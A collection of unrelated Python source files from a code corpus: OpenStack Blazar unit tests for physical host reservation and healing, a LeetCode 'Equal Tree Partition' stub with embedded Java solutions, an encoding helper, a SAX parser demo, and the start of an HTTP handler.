host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = []
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
matching_hosts.return_value = []
self.assertRaises(
manager_exceptions.NotEnoughHostsAvailable,
self.fake_phys_plugin.update_reservation,
'441c1476-9f8f-4700-9f30-cd9b6fef3509',
values)
def test_on_start(self):
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'reservation_id': u'593e7028-c0d1-4d76-8642-2ffd890b324c',
'aggregate_id': 1,
}
host_allocation_get_all_by_values = self.patch(
self.db_api, 'host_allocation_get_all_by_values')
host_allocation_get_all_by_values.return_value = [
{'compute_host_id': 'host1'},
]
host_get = self.patch(self.db_api, 'host_get')
host_get.return_value = {'service_name': 'host1_hostname'}
add_computehost = self.patch(
self.nova.ReservationPool, 'add_computehost')
self.fake_phys_plugin.on_start(u'04de74e8-193a-49d2-9ab8-cba7b49e45e8')
add_computehost.assert_called_with(1, ['host1_hostname'])
def test_before_end_with_no_action(self):
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {'before_end': ''}
reservationpool = self.patch(self.nova, 'ReservationPool')
self.fake_phys_plugin.before_end(
u'04de74e8-193a-49d2-9ab8-cba7b49e45e8')
reservationpool.assert_not_called()
def test_before_end_with_snapshot(self):
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'aggregate_id': 1,
'before_end': 'snapshot'
}
get_computehosts = self.patch(self.nova.ReservationPool,
'get_computehosts')
get_computehosts.return_value = ['host']
list_servers = self.patch(self.ServerManager, 'list')
list_servers.return_value = ['server1', 'server2']
create_image = self.patch(self.ServerManager, 'create_image')
self.fake_phys_plugin.before_end(
u'04de74e8-193a-49d2-9ab8-cba7b49e45e8')
create_image.assert_any_call(server='server1')
create_image.assert_any_call(server='server2')
def test_on_end_with_instances(self):
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'id': u'04de74e8-193a-49d2-9ab8-cba7b49e45e8',
'reservation_id': u'593e7028-c0d1-4d76-8642-2ffd890b324c',
'aggregate_id': 1
}
host_reservation_update = self.patch(
self.db_api,
'host_reservation_update')
host_allocation_get_all_by_values = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_allocation_get_all_by_values.return_value = [
{'id': u'bfa9aa0b-8042-43eb-a4e6-4555838bf64f',
'compute_host_id': u'cdae2a65-236f-475a-977d-f6ad82f828b7',
},
]
host_allocation_destroy = self.patch(
self.db_api,
'host_allocation_destroy')
get_computehosts = self.patch(self.nova.ReservationPool,
'get_computehosts')
get_computehosts.return_value = ['host']
list_servers = self.patch(self.ServerManager, 'list')
list_servers.return_value = ['server1', 'server2']
delete_server = self.patch(self.ServerManager, 'delete')
# Mock delete_server so the first call fails to find the instance.
# This can happen when the user is deleting instances concurrently.
delete_server.side_effect = mock.Mock(
side_effect=[nova_exceptions.NotFound(
404, 'Instance server1 could not be found.'), None])
delete_pool = self.patch(self.nova.ReservationPool, 'delete')
self.fake_phys_plugin.on_end(u'04de74e8-193a-49d2-9ab8-cba7b49e45e8')
host_reservation_update.assert_called_with(
u'04de74e8-193a-49d2-9ab8-cba7b49e45e8', {'status': 'completed'})
host_allocation_destroy.assert_called_with(
u'bfa9aa0b-8042-43eb-a4e6-4555838bf64f')
list_servers.assert_called_with(search_opts={'host': 'host',
'all_tenants': 1})
delete_server.assert_any_call(server='server1')
delete_server.assert_any_call(server='server2')
delete_pool.assert_called_with(1)
def test_on_end_without_instances(self):
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'id': u'04de74e8-193a-49d2-9ab8-cba7b49e45e8',
'reservation_id': u'593e7028-c0d1-4d76-8642-2ffd890b324c',
'aggregate_id': 1
}
host_reservation_update = self.patch(
self.db_api,
'host_reservation_update')
host_allocation_get_all_by_values = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_allocation_get_all_by_values.return_value = [
{'id': u'bfa9aa0b-8042-43eb-a4e6-4555838bf64f',
'compute_host_id': u'cdae2a65-236f-475a-977d-f6ad82f828b7',
},
]
host_allocation_destroy = self.patch(
self.db_api,
'host_allocation_destroy')
get_computehosts = self.patch(self.nova.ReservationPool,
'get_computehosts')
get_computehosts.return_value = ['host']
list_servers = self.patch(self.ServerManager, 'list')
list_servers.return_value = []
delete_server = self.patch(self.ServerManager, 'delete')
delete_pool = self.patch(self.nova.ReservationPool, 'delete')
self.fake_phys_plugin.on_end(u'04de74e8-193a-49d2-9ab8-cba7b49e45e8')
host_reservation_update.assert_called_with(
u'04de74e8-193a-49d2-9ab8-cba7b49e45e8', {'status': 'completed'})
host_allocation_destroy.assert_called_with(
u'bfa9aa0b-8042-43eb-a4e6-4555838bf64f')
delete_server.assert_not_called()
delete_pool.assert_called_with(1)
def test_heal_reservations_before_start_and_resources_changed(self):
failed_host = {'id': '1'}
dummy_reservation = {
'id': 'rsrv-1',
'resource_type': plugin.RESOURCE_TYPE,
'lease_id': 'lease-1',
'status': 'pending',
'hypervisor_properties': [],
'resource_properties': [],
'resource_id': 'resource-1',
'computehost_allocations': [{
'id': 'alloc-1', 'compute_host_id': failed_host['id'],
'reservation_id': 'rsrv-1'
}]
}
get_reservations = self.patch(self.db_utils,
'get_reservations_by_host_ids')
get_reservations.return_value = [dummy_reservation]
reallocate = self.patch(self.fake_phys_plugin, '_reallocate')
reallocate.return_value = True
result = self.fake_phys_plugin.heal_reservations(
[failed_host],
datetime.datetime(2020, 1, 1, 12, 00),
datetime.datetime(2020, 1, 1, 13, 00))
reallocate.assert_called_once_with(
dummy_reservation['computehost_allocations'][0])
self.assertEqual({}, result)
def test_heal_reservations_before_start_and_missing_resources(self):
failed_host = {'id': '1'}
dummy_reservation = {
'id': 'rsrv-1',
'resource_type': plugin.RESOURCE_TYPE,
'lease_id': 'lease-1',
'status': 'pending',
'hypervisor_properties': [],
'resource_properties': [],
'resource_id': 'resource-1',
'computehost_allocations': [{
'id': 'alloc-1', 'compute_host_id': failed_host['id'],
'reservation_id': 'rsrv-1'
}]
}
get_reservations = self.patch(self.db_utils,
'get_reservations_by_host_ids')
get_reservations.return_value = [dummy_reservation]
reallocate = self.patch(self.fake_phys_plugin, '_reallocate')
reallocate.return_value = False
result = self.fake_phys_plugin.heal_reservations(
[failed_host],
datetime.datetime(2020, 1, 1, 12, 00),
datetime.datetime(2020, 1, 1, 13, 00))
reallocate.assert_called_once_with(
dummy_reservation['computehost_allocations'][0])
self.assertEqual(
{dummy_reservation['id']: {'missing_resources': True}},
result)
def test_heal_active_reservations_and_resources_changed(self):
failed_host = {'id': '1'}
dummy_reservation = {
'id': 'rsrv-1',
'resource_type': plugin.RESOURCE_TYPE,
'lease_id': 'lease-1',
'status': 'active',
'hypervisor_properties': [],
'resource_properties': [],
'resource_id': 'resource-1',
'computehost_allocations': [{
'id': 'alloc-1', 'compute_host_id': failed_host['id'],
'reservation_id': 'rsrv-1'
}]
}
get_reservations = self.patch(self.db_utils,
'get_reservations_by_host_ids')
get_reservations.return_value = [dummy_reservation]
reallocate = self.patch(self.fake_phys_plugin, '_reallocate')
reallocate.return_value = True
result = self.fake_phys_plugin.heal_reservations(
[failed_host],
datetime.datetime(2020, 1, 1, 12, 00),
datetime.datetime(2020, 1, 1, 13, 00))
reallocate.assert_called_once_with(
dummy_reservation['computehost_allocations'][0])
self.assertEqual(
{dummy_reservation['id']: {'resources_changed': True}},
result)
def test_heal_active_reservations_and_missing_resources(self):
failed_host = {'id': '1'}
dummy_reservation = {
'id': 'rsrv-1',
'resource_type': plugin.RESOURCE_TYPE,
'lease_id': 'lease-1',
'status': 'active',
'hypervisor_properties': [],
'resource_properties': [],
'resource_id': 'resource-1',
'computehost_allocations': [{
'id': 'alloc-1', 'compute_host_id': failed_host['id'],
'reservation_id': 'rsrv-1'
}]
}
get_reservations = self.patch(self.db_utils,
'get_reservations_by_host_ids')
get_reservations.return_value = [dummy_reservation]
reallocate = self.patch(self.fake_phys_plugin, '_reallocate')
reallocate.return_value = False
result = self.fake_phys_plugin.heal_reservations(
[failed_host],
datetime.datetime(2020, 1, 1, 12, 00),
datetime.datetime(2020, 1, 1, 13, 00))
reallocate.assert_called_once_with(
dummy_reservation['computehost_allocations'][0])
self.assertEqual(
{dummy_reservation['id']: {'missing_resources': True}},
result)
def test_reallocate_before_start(self):
failed_host = {'id': '1'}
new_host = {'id': '2'}
dummy_allocation = {
'id': 'alloc-1',
'compute_host_id': failed_host['id'],
'reservation_id': 'rsrv-1'
}
dummy_reservation = {
'id': 'rsrv-1',
'resource_type': plugin.RESOURCE_TYPE,
'lease_id': 'lease-1',
'status': 'pending',
'hypervisor_properties': [],
'resource_properties': [],
'resource_id': 'resource-1'
}
dummy_host_reservation = {
'aggregate_id': 1
}
dummy_lease = {
'name': 'lease-name',
'start_date': datetime.datetime(2020, 1, 1, 12, 00),
'end_date': datetime.datetime(2020, 1, 2, 12, 00),
'trust_id': 'trust-1'
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = dummy_reservation
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = dummy_host_reservation
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = dummy_lease
matching_hosts = self.patch(host_plugin.PhysicalHostPlugin,
'_matching_hosts')
matching_hosts.return_value = [new_host['id']]
alloc_update = self.patch(self.db_api, 'host_allocation_update')
with mock.patch.object(datetime, 'datetime',
mock.Mock(wraps=datetime.datetime)) as patched:
patched.utcnow.return_value = datetime.datetime(
2020, 1, 1, 11, 00)
result = self.fake_phys_plugin._reallocate(dummy_allocation)
matching_hosts.assert_called_once_with(
dummy_reservation['hypervisor_properties'],
dummy_reservation['resource_properties'],
'1-1', dummy_lease['start_date'], dummy_lease['end_date'])
alloc_update.assert_called_once_with(
dummy_allocation['id'],
{'compute_host_id': new_host['id']})
self.assertEqual(True, result)
def test_reallocate_active(self):
failed_host = {'id': '1',
'service_name': 'compute-1'}
new_host = {'id': '2',
'service_name': 'compute-2'}
dummy_allocation = {
'id': 'alloc-1',
'compute_host_id': failed_host['id'],
'reservation_id': 'rsrv-1'
}
dummy_reservation = {
'id': 'rsrv-1',
'resource_type': plugin.RESOURCE_TYPE,
'lease_id': 'lease-1',
'status': 'active',
'hypervisor_properties': [],
'resource_properties': [],
'resource_id': 'resource-1'
}
dummy_host_reservation = {
'aggregate_id': 1
}
dummy_lease = {
'name': 'lease-name',
'start_date': datetime.datetime(2020, 1, 1, 12, 00),
'end_date': datetime.datetime(2020, 1, 2, 12, 00),
'trust_id': 'trust-1'
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = dummy_reservation
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = dummy_lease
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = dummy_host_reservation
host_get = self.patch(self.db_api, 'host_get')
host_get.side_effect = [failed_host, new_host]
matching_hosts = self.patch(host_plugin.PhysicalHostPlugin,
'_matching_hosts')
matching_hosts.return_value = [new_host['id']]
alloc_update = self.patch(self.db_api, 'host_allocation_update')
with mock.patch.object(datetime, 'datetime',
mock.Mock(wraps=datetime.datetime)) as patched:
patched.utcnow.return_value = datetime.datetime(
2020, 1, 1, 13, 00)
result = self.fake_phys_plugin._reallocate(dummy_allocation)
self.remove_compute_host.assert_called_once_with(
dummy_host_reservation['aggregate_id'],
failed_host['service_name'])
matching_hosts.assert_called_once_with(
dummy_reservation['hypervisor_properties'],
dummy_reservation['resource_properties'],
'1-1', datetime.datetime(2020, 1, 1, 13, 00),
dummy_lease['end_date'])
alloc_update.assert_called_once_with(
dummy_allocation['id'],
{'compute_host_id': new_host['id']})
self.add_compute_host(
dummy_host_reservation['aggregate_id'],
new_host['service_name'])
self.assertEqual(True, result)
def test_reallocate_missing_resources(self):
failed_host = {'id': '1'}
dummy_allocation = {
'id': 'alloc-1',
'compute_host_id': failed_host['id'],
'reservation_id': 'rsrv-1'
}
dummy_reservation = {
'id': 'rsrv-1',
'resource_type': plugin.RESOURCE_TYPE,
'lease_id': 'lease-1',
'status': 'pending',
'hypervisor_properties': [],
'resource_properties': [],
'resource_id': 'resource-1'
}
dummy_host_reservation = {
'aggregate_id': 1
}
dummy_lease = {
'name': 'lease-name',
'start_date': datetime.datetime(2020, 1, 1, 12, 00),
'end_date': datetime.datetime(2020, 1, 2, 12, 00),
'trust_id': 'trust-1'
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = dummy_reservation
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = dummy_host_reservation
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = dummy_lease
matching_hosts = self.patch(host_plugin.PhysicalHostPlugin,
'_matching_hosts')
matching_hosts.return_value = []
alloc_destroy = self.patch(self.db_api, 'host_allocation_destroy')
with mock.patch.object(datetime, 'datetime',
mock.Mock(wraps=datetime.datetime)) as patched:
patched.utcnow.return_value = datetime.datetime(
2020, 1, 1, 11, 00)
result = self.fake_phys_plugin._reallocate(dummy_allocation)
matching_hosts.assert_called_once_with(
dummy_reservation['hypervisor_properties'],
dummy_reservation['resource_properties'],
'1-1', dummy_lease['start_date'], dummy_lease['end_date'])
alloc_destroy.assert_called_once_with(dummy_allocation['id'])
self.assertEqual(False, result)
def test_matching_hosts_not_allocated_hosts(self):
def host_allocation_get_all_by_values(**kwargs):
if kwargs['compute_host_id'] == 'host1':
return True
host_get = self.patch(
self.db_api,
'reservable_host_get_all_by_queries')
host_get.return_value = [
{'id': 'host1'},
{'id': 'host2'},
{'id': 'host3'},
]
host_get = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_get.side_effect = host_allocation_get_all_by_values
host_get = self.patch(
self.db_utils,
'get_free_periods')
host_get.return_value = [
(datetime.datetime(2013, 12, 19, 20, 00),
datetime.datetime(2013, 12, 19, 21, 00)),
]
result = self.fake_phys_plugin._matching_hosts(
'[]', '[]', '1-3',
datetime.datetime(2013, 12, 19, 20, 00),
datetime.datetime(2013, 12, 19, 21, 00))
self.assertEqual(['host2', 'host3'], result)
def test_matching_hosts_allocated_hosts(self):
def host_allocation_get_all_by_values(**kwargs):
if kwargs['compute_host_id'] == 'host1':
return True
host_get = self.patch(
self.db_api,
'reservable_host_get_all_by_queries')
host_get.return_value = [
{'id': 'host1'},
{'id': 'host2'},
{'id': 'host3'},
]
host_get = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_get.side_effect = host_allocation_get_all_by_values
host_get = self.patch(
self.db_utils,
'get_free_periods')
host_get.return_value = [
(datetime.datetime(2013, 12, 19, 20, 00),
datetime.datetime(2013, 12, 19, 21, 00)),
]
result = self.fake_phys_plugin._matching_hosts(
'[]', '[]', '3-3',
datetime.datetime(2013, 12, 19, 20, 00),
datetime.datetime(2013, 12, 19, 21, 00))
self.assertEqual(['host1', 'host2', 'host3'], result)
def test_matching_hosts_allocated_hosts_with_cleaning_time(self):
def host_allocation_get_all_by_values(**kwargs):
if kwargs['compute_host_id'] == 'host1':
return True
self.cfg.CONF.set_override('cleaning_time', '5')
host_get = self.patch(
self.db_api,
'reservable_host_get_all_by_queries')
host_get.return_value = [
{'id': 'host1'},
{'id': 'host2'},
{'id': 'host3'},
]
host_get = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_get.side_effect = host_allocation_get_all_by_values
host_get = self.patch(
self.db_utils,
'get_free_periods')
host_get.return_value = [
(datetime.datetime(2013, 12, 19, 20, 00)
- datetime.timedelta(minutes=5),
datetime.datetime(2013, 12, 19, 21, 00)
+ datetime.timedelta(minutes=5))
]
result = self.fake_phys_plugin._matching_hosts(
'[]', '[]', '3-3',
datetime.datetime(2013, 12, 19, 20, 00),
datetime.datetime(2013, 12, 19, 21, 00))
self.assertEqual(['host1', 'host2', 'host3'], result)
def test_matching_hosts_not_matching(self):
host_get = self.patch(
self.db_api,
'reservable_host_get_all_by_queries')
host_get.return_value = []
result = self.fake_phys_plugin._matching_hosts(
'["=", "$memory_mb", "2048"]', '[]', '1-1',
datetime.datetime(2013, 12, 19, 20, 00),
datetime.datetime(2013, 12, 19, 21, 00))
self.assertEqual([], result)
def test_check_params_with_valid_before_end(self):
values = {
'min': 1,
'max': 2,
'resource_properties': '',
'hypervisor_properties': '',
'before_end': 'snapshot'
}
self.fake_phys_plugin._check_params(values)
self.assertEqual(values['before_end'], 'snapshot')
def test_check_params_with_invalid_before_end(self):
values = {
'min': 1,
'max': 2,
'resource_properties': '',
'hypervisor_properties': '',
'before_end': 'invalid'
}
self.assertRaises(manager_exceptions.MalformedParameter,
self.fake_phys_plugin._check_params,
values)
def test_check_params_without_before_end(self):
self.cfg.CONF.set_override('before_end', '',
group='physical:host')
values = {
'min': 1,
'max': 2,
'resource_properties': '',
'hypervisor_properties': ''
}
self.fake_phys_plugin._check_params(values)
self.assertEqual(values['before_end'], 'default')
class PhysicalHostMonitorPluginTestCase(tests.TestCase):
def setUp(self):
super(PhysicalHostMonitorPluginTestCase, self).setUp()
self.patch(nova_client, 'Client')
self.host_monitor_plugin = host_plugin.PhysicalHostMonitorPlugin()
def test_configuration(self):
# reset the singleton at first
host_plugin.PhysicalHostMonitorPlugin._instance = None
self.cfg = self.useFixture(conf_fixture.Config(CONF))
self.cfg.config(os_admin_username='fake-user')
self.cfg.config(os_admin_password='fake-passwd')
self.cfg.config(os_admin_user_domain_name='fake-user-domain')
self.cfg.config(os_admin_project_name='fake-pj-name')
self.cfg.config(os_admin_project_domain_name='fake-pj-domain')
self.host_monitor_plugin = host_plugin.PhysicalHostMonitorPlugin()
self.assertEqual('fake-user', self.host_monitor_plugin.username)
self.assertEqual("fake-passwd", self.host_monitor_plugin.password)
self.assertEqual("fake-user-domain",
self.host_monitor_plugin.user_domain_name)
self.assertEqual("fake-pj-name", self.host_monitor_plugin.project_name)
self.assertEqual("fake-pj-domain",
self.host_monitor_plugin.project_domain_name)
def test_notification_callback_disabled_true(self):
failed_host = {'hypervisor_hostname': 'hypvsr1'}
event_type = 'service.update'
payload = {
'nova_object.namespace': 'nova',
'nova_object.name': 'ServiceStatusPayload',
'nova_object.version': '1.1',
'nova_object.data': {
'host': failed_host['hypervisor_hostname'],
'disabled': True,
'last_seen_up': '2012-10-29T13:42:05Z',
'binary': 'nova-compute',
'topic': 'compute',
'disabled_reason': None,
'report_count': 1,
'forced_down': False,
'version': 22,
'availability_zone': None,
'uuid': 'fa69c544-906b-4a6a-a9c6-c1f7a8078c73'
}
}
host_get_all = self.patch(db_api,
'reservable_host_get_all_by_queries')
host_get_all.return_value = [failed_host]
handle_failures = self.patch(self.host_monitor_plugin,
'_handle_failures')
handle_failures.return_value = {'rsrv-1': {'missing_resources': True}}
result = self.host_monitor_plugin.notification_callback(event_type,
payload)
host_get_all.assert_called_once_with(
['hypervisor_hostname == ' + payload['nova_object.data']['host']])
self.assertEqual({'rsrv-1': {'missing_resources': True}}, result)
def test_notification_callback_no_failure(self):
event_type = 'service.update'
payload = {
'nova_object.namespace': 'nova',
'nova_object.name': 'ServiceStatusPayload',
'nova_object.version': '1.1',
'nova_object.data': {
'host': 'compute-1',
'disabled': False,
'last_seen_up': '2012-10-29T13:42:05Z',
'binary': 'nova-compute',
'topic': 'compute',
'disabled_reason': None,
'report_count': 1,
'forced_down': False,
'version': 22,
'availability_zone': None,
'uuid': 'fa69c544-906b-4a6a-a9c6-c1f7a8078c73'
}
}
host_get_all = self.patch(db_api, 'host_get_all_by_queries')
host_get_all.return_value = []
handle_failures = self.patch(self.host_monitor_plugin,
'_handle_failures')
result = self.host_monitor_plugin.notification_callback(event_type,
payload)
host_get_all.assert_called_once_with(
['reservable == 0',
'hypervisor_hostname == ' + payload['nova_object.data']['host']])
handle_failures.assert_not_called()
self.assertEqual({}, result)
def test_notification_callback_recover(self):
recovered_host = {'hypervisor_hostname': 'hypvsr1', 'id': 1}
event_type = 'service.update'
payload = {
'nova_object.namespace': 'nova',
'nova_object.name': 'ServiceStatusPayload',
'nova_object.version': '1.1',
'nova_object.data': {
'host': 'compute-1',
'disabled': False,
'last_seen_up': '2012-10-29T13:42:05Z',
'binary': 'nova-compute',
'topic': 'compute',
'disabled_reason': None,
'report_count': 1,
'forced_down': False,
'version': 22,
'availability_zone': None,
'uuid': 'fa69c544-906b-4a6a-a9c6-c1f7a8078c73'
}
}
host_get_all = self.patch(db_api, 'host_get_all_by_queries')
host_get_all.return_value = [recovered_host]
handle_failures = self.patch(self.host_monitor_plugin,
'_handle_failures')
host_update = self.patch(db_api, 'host_update')
result = self.host_monitor_plugin.notification_callback(event_type,
payload)
host_get_all.assert_called_once_with(
['reservable == 0',
'hypervisor_hostname == ' + payload['nova_object.data']['host']])
host_update.assert_called_once_with(recovered_host['id'],
{'reservable': True})
handle_failures.assert_not_called()
self.assertEqual({}, result)
def test_poll_resource_failures_state_down(self):
hosts = [
{'id': '1',
'hypervisor_hostname': 'hypvsr1',
'reservable': True},
{'id': '2',
'hypervisor_hostname': 'hypvsr2',
'reservable': True},
]
host_get_all = self.patch(db_api,
'host_get_all_by_filters')
host_get_all.return_value = hosts
hypervisors_list = self.patch(
self.host_monitor_plugin.nova.hypervisors, 'list')
hypervisors_list.return_value = [
mock.MagicMock(id=1, state='down', status='enabled'),
mock.MagicMock(id=2, state='down', status='enabled')]
result = self.host_monitor_plugin._poll_resource_failures()
self.assertEqual((hosts, []), result)
def test_poll_resource_failures_status_disabled(self):
hosts = [
{'id': '1',
'hypervisor_hostname': 'hypvsr1',
'reservable': True},
{'id': '2',
'hypervisor_hostname': 'hypvsr2',
'reservable': True},
]
host_get_all = self.patch(db_api,
'host_get_all_by_filters')
host_get_all.return_value = hosts
hypervisors_list = self.patch(
self.host_monitor_plugin.nova.hypervisors, 'list')
hypervisors_list.return_value = [
mock.MagicMock(id=1, state='up', status='disabled'),
mock.MagicMock(id=2, state='up', status='disabled')]
result = self.host_monitor_plugin._poll_resource_failures()
self.assertEqual((hosts, []), result)
def test_poll_resource_failures_nothing(self):
hosts = [
{'id': '1',
'hypervisor_hostname': 'hypvsr1',
'reservable': True},
{'id': '2',
'hypervisor_hostname': 'hypvsr2',
'reservable': True},
]
host_get_all = self.patch(db_api,
'host_get_all_by_filters')
host_get_all.return_value = hosts
hypervisors_list = self.patch(
self.host_monitor_plugin.nova.hypervisors, 'list')
hypervisors_list.return_value = [
mock.MagicMock(id=1, state='up', status='enabled'),
mock.MagicMock(id=2, state='up', status='enabled')]
result = self.host_monitor_plugin._poll_resource_failures()
self.assertEqual(([], []), result)
def test_poll_resource_failures_recover(self):
hosts = [
{'id': '1',
'hypervisor_hostname': 'hypvsr1',
'reservable': False},
{'id': '2',
'hypervisor_hostname': 'hypvsr2',
'reservable': False},
]
host_get_all = self.patch(db_api,
'host_get_all_by_filters')
host_get_all.return_value = hosts
hypervisors_list = self.patch(
self.host_monitor_plugin.nova.hypervisors, 'list')
hypervisors_list.return_value = [
mock.MagicMock(id=1, state='up', status='enabled'),
mock.MagicMock(id=2, state='up', status='enabled')]
result = self.host_monitor_plugin._poll_resource_failures()
self.assertEqual(([], hosts), result)
def test_handle_failures(self):
failed_hosts = [
{'id': '1',
'hypervisor_hostname': 'hypvsr1'}
]
host_update = self.patch(db_api, 'host_update')
heal = self.patch(self.host_monitor_plugin, 'heal')
self.host_monitor_plugin._handle_failures(failed_hosts)
host_update.assert_called_once_with(failed_hosts[0]['id'],
{'reservable': False})
heal.assert_called_once()
def test_heal(self):
failed_hosts = [
{'id': '1',
'hypervisor_hostname': 'hypvsr1'}
]
reservation_flags = {
'rsrv-1': {'missing_resources': True}
}
hosts_get = self.patch(db_api, 'unreservable_host_get_all_by_queries')
hosts_get.return_value = failed_hosts
get_healing_interval = self.patch(self.host_monitor_plugin,
'get_healing_interval')
get_healing_interval.return_value = 60
healing_handler = mock.Mock()
healing_handler.return_value = reservation_flags
self.host_monitor_plugin.healing_handlers = [healing_handler]
start_date = datetime.datetime(2020, 1, 1, 12, 00)
with mock.patch.object(datetime, 'datetime',
mock.Mock(wraps=datetime.datetime)) as patched:
patched.utcnow.return_value = start_date
result = self.host_monitor_plugin.heal()
healing_handler.assert_called_once_with(
failed_hosts, start_date,
start_date + datetime.timedelta(minutes=60)
)
self.assertEqual(reservation_flags, result)
| stackforge/blazar | blazar/tests/plugins/oshosts/test_physical_host_plugin.py | Python | apache-2.0 | 103,122 |
__source__ = 'https://leetcode.com/problems/equal-tree-partition/discuss/'
# Time: O()
# Space: O()
#
# Description: Leetcode # 663. Equal Tree Partition
#
# Given a binary tree with n nodes,
# your task is to check if it's possible to partition the tree to two trees
# which have the equal sum of values after removing exactly one edge on the original tree.
#
# Example 1:
# Input:
# 5
# / \
# 10 10
# / \
# 2 3
#
# Output: True
# Explanation:
# 5
# /
# 10
#
# Sum: 15
#
# 10
# / \
# 2 3
#
# Sum: 15
# Example 2:
# Input:
# 1
# / \
# 2 10
# / \
# 2 20
#
# Output: False
# Explanation: You can't split the tree into two trees with equal sum after removing exactly one edge on the tree.
# Note:
# The range of tree node value is in the range of [-100000, 100000].
# 1 <= n <= 10000
#
# Companies
# Amazon
# Related Topics
# Tree
#
import unittest
class Solution(object):
pass # your function here
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
# Thought: https://leetcode.com/problems/equal-tree-partition/solution/
/**
* Definition for a binary tree node.
* public class TreeNode {
* int val;
* TreeNode left;
* TreeNode right;
* TreeNode(int x) { val = x; }
* }
*/
# 7ms 98.08%
class class Solution {
int judge=0;
public boolean checkEqualTree(TreeNode root) {
if(root==null)
return false;
int s=sum(root);
if(s%2!=0)
return false;
check(root.left,s/2);
check(root.right,s/2);
if(judge==1)
return true;
return false;
}
private int sum(TreeNode root){
if(root==null)
return 0;
return root.val+sum(root.left)+sum(root.right);
}
private int check(TreeNode root,int half){
if(root==null)
return 0;
int s=root.val+check(root.left,half)+check(root.right,half);
if(s==half)
judge=1;
return s;
}
}
# hash map
# 14ms 31.49%
class Solution {
public boolean checkEqualTree(TreeNode root) {
Map<Integer, Integer> map = new HashMap<Integer, Integer>();
int sum = getsum(root, map);
if(sum == 0)return map.getOrDefault(sum, 0) > 1;
return sum%2 == 0 && map.containsKey(sum/2);
}
public int getsum(TreeNode root, Map<Integer, Integer> map ){
if(root == null)return 0;
int cur = root.val + getsum(root.left, map) + getsum(root.right, map);
map.put(cur, map.getOrDefault(cur,0) + 1);
return cur;
}
}
''' | JulyKikuAkita/PythonPrac | cs15211/EqualTreePartition.py | Python | apache-2.0 | 2,676 |
import sys
class Encoding(object):
@staticmethod
def normalize(value):
"""
Normalize value
:param value: The value
:return: The processed value
"""
# Python 2 vs Python 3
if sys.version_info < (3, 0):
return Encoding.to_ascii(value)
else:
return Encoding.to_unicode(value)
@staticmethod
def to_ascii(value):
"""
To ascii
:param value: The value
:return: The processed value
"""
# Dict
if isinstance(value, dict):
processed_value = {}
for key in value:
if Encoding._is_unicode(key):
processed_key = key.encode('ascii')
else:
processed_key = key
processed_value[processed_key] = Encoding.to_ascii(value[key])
# List
elif isinstance(value, list):
processed_value = []
for value in value:
processed_value.append(Encoding.to_ascii(value))
# Unicode
elif Encoding._is_unicode(value):
processed_value = value.encode('ascii')
else:
processed_value = value
return processed_value
@staticmethod
def to_unicode(value):
"""
To unicode
:param value: The value
:return: The processed value
"""
# Dict
if isinstance(value, dict):
processed_value = {}
for key in value:
if Encoding._is_ascii(key):
processed_key = key.decode('utf-8')
else:
processed_key = key
processed_value[processed_key] = Encoding.to_unicode(value[key])
# List
elif isinstance(value, list):
processed_value = []
for value in value:
processed_value.append(Encoding.to_unicode(value))
# Unicode
elif Encoding._is_ascii(value):
processed_value = value.decode('utf-8')
else:
processed_value = value
return processed_value
@staticmethod
def _is_ascii(value):
"""
Check if ascii
:param value: The value
:return: Ascii or not
"""
# Python 2 vs Python 3
if sys.version_info < (3, 0):
return isinstance(value, str)
else:
return isinstance(value, bytes)
@staticmethod
def _is_unicode(value):
"""
Check if unicode
:param value: The value
:return: Ascii or not
"""
# Python 2 vs Python 3
if sys.version_info < (3, 0):
return isinstance(value, unicode)
else:
return isinstance(value, str)
| LowieHuyghe/script-core | scriptcore/encoding/encoding.py | Python | apache-2.0 | 2,861 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from xml.parsers.expat import ParserCreate
class DefaultSaxHandler(object):
def start_element(self, name, attrs):
print('sax:start_element: %s, attrs: %s' % (name, str(attrs)))
def end_element(self, name):
print('sax:end_element: %s' % name)
def char_data(self, text):
print('sax:char_data: %s' % text)
xml = r'''<?xml version="1.0"?>
<ol>
<li><a href="/python">Python</a></li>
<li><a href="/ruby">Ruby</a></li>
</ol>
'''
handler = DefaultSaxHandler()
parser = ParserCreate()
parser.StartElementHandler = handler.start_element
parser.EndElementHandler = handler.end_element
parser.CharacterDataHandler = handler.char_data
parser.Parse(xml)
| whyDK37/py_bootstrap | samples/commonlib/use_sax.py | Python | apache-2.0 | 739 |
# Copyright [2017] [name of copyright owner]
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and limitations under the License.
# Author : Álvaro Román Royo ([email protected])
import http.server
import http.client
import json
import socketserver
class testHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
